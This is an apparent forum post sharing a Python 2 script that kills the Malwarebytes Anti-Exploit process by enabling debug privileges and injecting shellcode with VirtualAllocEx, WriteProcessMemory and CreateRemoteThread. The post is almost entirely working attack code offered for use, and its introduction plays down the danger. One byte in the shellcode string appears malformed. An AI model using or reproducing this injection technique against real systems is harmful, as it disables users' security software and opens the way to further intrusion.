Malwarebytes Anti-Exploit version: 0.09.4.2000 perhaps in final version will not be possible to do this, but until then you can make mbae do what you want:)) this script only make him exit, nothing dangerous #python 2.7.5#ViRii.tkimport sysfrom ctypes import *import win32securityimport win32apiimport psutil #http://code.google.com/p/psutil/import timekernel32 = windll.kernel32processname = "mbae.exe" shellcode = "\xb4\x4c\b0\x00\xcd\x21"def getpid(pname): for proc in psutil.process_iter(): if proc.name == pname: return proc.pid temp99 = getpid(processname)if temp99!= None: pid = temp99 print "Malwarebytes Anti-Exploit process located: %i"% pidelse: print "Nu am gasit procesul: %s" %processname sys.exit()print "\tHoold..."time.sleep(0.5)print "\tHoooold..."time.sleep(1)print "\tHoooooooooold..."PAGE_EXECUTE_READWRITE = 0x00000040PROCESS_ALL_ACCESS = 0x1F0FFFVIRTUAL_MEM = 0x3000 #set privpriv_flags = win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERYhToken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), priv_flags)# enable "debug process"privilege_id = win32security.LookupPrivilegeValue (None,win32security.SE_DEBUG_NAME)old_privs = win32security.AdjustTokenPrivileges (hToken, 0,[(privilege_id, win32security.SE_PRIVILEGE_ENABLED)])proces = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, pid)if not proces: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0)#code_size = len(shellcode) #Allocate some space for the shellcodearg_address = kernel32.VirtualAllocEx(proces, 0, code_size,VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)# Write out the shellcodewritten = c_int(0)kernel32.WriteProcessMemory(proces, arg_address, shellcode,code_size, byref(written))# Now we create the remote thread and point its entry routine to be head of our shellcodethread_id = c_ulong(0)if not kernel32.CreateRemoteThread(proces,None,0,arg_address,None,0,byref(thread_id)): print "[*] Failed to inject process. Exiting." sys.exit(0)else: print "Malwarebytes Anti-Exploit process was killed"# clean upwin32api.CloseHandle(hToken)Script source: Shellcode injection